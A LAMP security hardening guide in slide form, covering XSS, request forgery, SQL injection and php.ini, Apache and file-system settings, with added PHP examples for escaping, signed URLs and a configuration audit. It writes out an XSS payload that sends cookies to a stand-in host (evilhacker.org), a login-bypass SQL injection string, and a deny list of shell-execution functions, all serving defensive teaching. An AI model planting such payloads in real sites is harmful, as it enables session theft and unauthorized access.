LAMP security practices
1. LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
2. XSS
A hacker posts the code snippet below in the comment section of the website http://exsite.com:
Hello Everyone!<script>document.write("<img src='http://evilhacker.org/?" + document.cookie + "'>");</script>
The code will load as-is whenever I open the website http://exsite.com and will transfer my cookie data to the hacker's site (http://evilhacker.org).
Note that the cookie data may contain my login credentials, which you as a hacker can use to
3. XSS solution
All user-submitted content should be filtered and all disallowed characters should be removed.
In particular, <, > and all HTML tags should be stripped.
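Added example (not code from the original slides): the comment from slide 2 rendered with escaping on output, plus the session cookie flags that keep the cookie out of document.cookie so the payload on slide 2 has nothing to send. The function name escape_html is assumed.

```php
<?php
// Added example, not from the original slides: render a comment safely by
// escaping on output, and keep the session cookie out of document.cookie.

// Constructed sample input: the payload from slide 2.
$comment = 'Hello Everyone!<script>document.write("<img src=\'http://evilhacker.org/?"'
         . ' + document.cookie + "\'>");</script>';

// Escape for HTML text and attribute contexts. ENT_QUOTES also encodes single
// quotes, so the result is safe inside single-quoted attributes too.
function escape_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Cookie flags belong in php.ini or must be set before session_start().
// HttpOnly removes the cookie from document.cookie, so the script on slide 2
// has nothing to exfiltrate even if escaping is missed somewhere.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');      // send only over HTTPS
ini_set('session.cookie_samesite', 'Lax');  // PHP 7.3 and later

echo '<div class="comment">' . escape_html($comment) . '</div>' . PHP_EOL;
// The browser shows the <script> text literally; nothing executes.
```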
4. Request Forgeries
Create, Update and Delete requests should be verified to have originated from your application.
Ex. Don't use a URL like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signed URL valid for a predefined time. Check the code below:
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
$_SESSION['signature_timestamp'] = time();
echo "<a href='http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}'>";
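Added example (not code from the original slides) that generalizes the slide's signed URL: the signature is an HMAC over the photo id and an expiry time, keyed by a per-session random secret, and verified in constant time on the server. The function names, SIGNATURE_TTL and the in-memory $session array standing in for $_SESSION are assumptions.

```php
<?php
// Added example, not from the original slides: a signed, time-limited delete
// link. Same idea as the slide, but the secret comes from a CSPRNG, the
// signature is bound to the photo id, and the server checks the expiry.
const SIGNATURE_TTL = 300; // seconds the link stays valid (assumed value)

// Hypothetical helper: build the delete URL. The session secret is created
// once per session; rand()/md5() on the slide are not suitable for this.
function sign_delete_url(array &$session, int $photoId): string
{
    if (empty($session['csrf_secret'])) {
        // random_bytes() is a CSPRNG; the secret never leaves the server.
        $session['csrf_secret'] = bin2hex(random_bytes(32));
    }
    $expires = time() + SIGNATURE_TTL;
    $sig = hash_hmac('sha256', $photoId . '|' . $expires, $session['csrf_secret']);
    return 'http://mysite.com/photos/delete/' . $photoId
         . '?expires=' . $expires . '&signature=' . $sig;
}

// Hypothetical helper: verify before deleting. Recompute and compare in constant time.
function verify_delete_request(array $session, int $photoId, int $expires, string $sig): bool
{
    if (empty($session['csrf_secret']) || $expires < time()) {
        return false; // no session secret, or the link has expired
    }
    $expected = hash_hmac('sha256', $photoId . '|' . $expires, $session['csrf_secret']);
    return hash_equals($expected, $sig); // avoids a timing side channel
}

// Demo with an in-memory array standing in for $_SESSION.
$session = [];
$url = sign_delete_url($session, 42);
parse_str(parse_url($url, PHP_URL_QUERY), $q);
var_dump(verify_delete_request($session, 42, (int)$q['expires'], $q['signature'])); // genuine link
var_dump(verify_delete_request($session, 43, (int)$q['expires'], $q['signature'])); // replayed against another photo
```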
6. SQL Injection
Ex. Input ' OR '1'='1 in the userid field of the login form. If the server script for authentication uses "SELECT * FROM tblusers WHERE userid = '{$_GET['userid']}'", this is interpolated to "SELECT * FROM tblusers WHERE userid = '' OR '1'='1'", which returns valid records from the database.
7. SQL Injection Solution
Use mysqli_real_escape_string($connection, $_GET['userid']) for all user-supplied data
Use prepared statements:
$statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
$statement->bind_param("s", $_GET['userid']); // "s": userid is compared as a string in the query above
$statement->execute();
8. Disable PHP information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
The output shows that the site runs on PHP, and the PHP version as well.
Disable this information by setting expose_php = Off in php.ini
9. Disable Server Information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
The output shows the Apache server, its version, and the OS (Ubuntu).
Disable this information by setting
ServerSignature Off
ServerTokens Prod
in the /etc/apache2/conf.d/security file on Ubuntu, or in httpd.conf
10. Disable unnecessary modules
Use php -m to list the enabled modules
Disable modules like gd if they are not required
On Ubuntu, go to the folder /etc/php5/conf.d
Run: sudo mv gd.{ini,disable}
This renames the file gd.ini to gd.disable, so the gd module is no longer loaded with PHP
11. Log PHP errors
Use the following to stop PHP error messages from being displayed to site users:
display_errors = Off
Use the following to log the PHP error messages into a log file:
log_errors = On
error_log = /var/log/httpd/php-error.log
For real-time monitoring of the PHP error log use:
tail -f /var/log/httpd/php-error.log
12. Disable File Uploads
If your site doesn't need file upload functionality, turn it off in php.ini:
file_uploads = Off
If your site needs file upload functionality, set the limit to the required minimum:
file_uploads = On
upload_max_filesize = 1M
13. DoS attack
To avoid a script running for an unbounded time and bringing down the server, use the following settings:
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
14. Remote Code Execution
Remote URLs can be opened by PHP functions like fopen, file_get_contents, include and require.
These remote URLs are a frequent cause of code injection and data leakage when programmers do not filter them carefully.
To restrict remote file opening:
allow_url_fopen = Off
allow_url_include = Off
15. Disable Dangerous PHP functions
Use the following directive to disable PHP functions that are very powerful, dangerous and not normally required when PHP is running under a web server:
disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
16. Limit Access to File System
Use the following to restrict PHP's access to parts of the file system:
open_basedir="/var/www/html/"
The above denies PHP access to parts of the file system such as /etc or /tmp.
17. Session file path
Session files must be saved outside the web site folder. Use the following to change the location of session and upload temp files:
session.save_path="/var/lib/php/session"
upload_tmp_dir="/var/lib/php/upload"
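Added example (not code from the original slides): a PHP script that audits the running interpreter's configuration against the php.ini values recommended on slides 8 to 17, so a practitioner can confirm the hardening actually took effect for the SAPI that serves the site. It assumes PHP 8 (match expression) and uses only ini_get(); the EXPECTED table and function names are assumptions.

```php
<?php
// Added example, not from the original slides: audit the running PHP's
// configuration against the hardening values on slides 8 to 17 (PHP 8).
// Directive => [check kind, wanted value]. 'bool' compares on/off, 'max' is an
// upper bound (sizes such as "40M" converted to bytes), 'set' must be non-empty.
const EXPECTED = [
    'expose_php'         => ['bool', false],
    'display_errors'     => ['bool', false],
    'log_errors'         => ['bool', true],
    'allow_url_fopen'    => ['bool', false],
    'allow_url_include'  => ['bool', false],
    'file_uploads'       => ['bool', false],
    'max_execution_time' => ['max', 30],
    'max_input_time'     => ['max', 30],
    'memory_limit'       => ['max', 40 * 1024 * 1024],
    'open_basedir'       => ['set', null],
    'session.save_path'  => ['set', null],
    'disable_functions'  => ['set', null],
];

// Convert ini shorthand ("1M", "40M", "2G") to bytes; plain numbers pass through.
function ini_bytes(string $v): int
{
    $n = (int)$v;
    return match (strtoupper(substr(trim($v), -1))) {
        'G' => $n << 30, 'M' => $n << 20, 'K' => $n << 10, default => $n,
    };
}

// Returns one finding line per directive that is weaker than EXPECTED.
function audit_ini(array $expected): array
{
    $findings = [];
    foreach ($expected as $key => [$kind, $want]) {
        $val = ini_get($key);  // string, or false if the directive is unknown
        $ok = match ($kind) {
            'bool' => filter_var($val, FILTER_VALIDATE_BOOLEAN) === $want,
            // 0 or -1 means "unlimited" for these limits, so they fail too
            'max'  => $val !== false && (int)$val > 0 && ini_bytes($val) <= $want,
            'set'  => $val !== false && $val !== '',
        };
        if (!$ok) {
            $findings[] = sprintf('%-20s current=%s', $key, var_export($val, true));
        }
    }
    return $findings;
}

foreach (audit_ini(EXPECTED) as $f) echo "WEAK: $f\n";
```

Run it through the same SAPI you serve with (for example as a one-off page under mod_php or php-fpm), because the CLI reads its own php.ini and can pass while the web server configuration is still weak.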
18. Write protect conf and application files
Use the chattr +i command to write-protect any file:
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr +i /var/www/html/
Such files then cannot be modified, even by the root user.
Use the chattr -i command to remove the write protection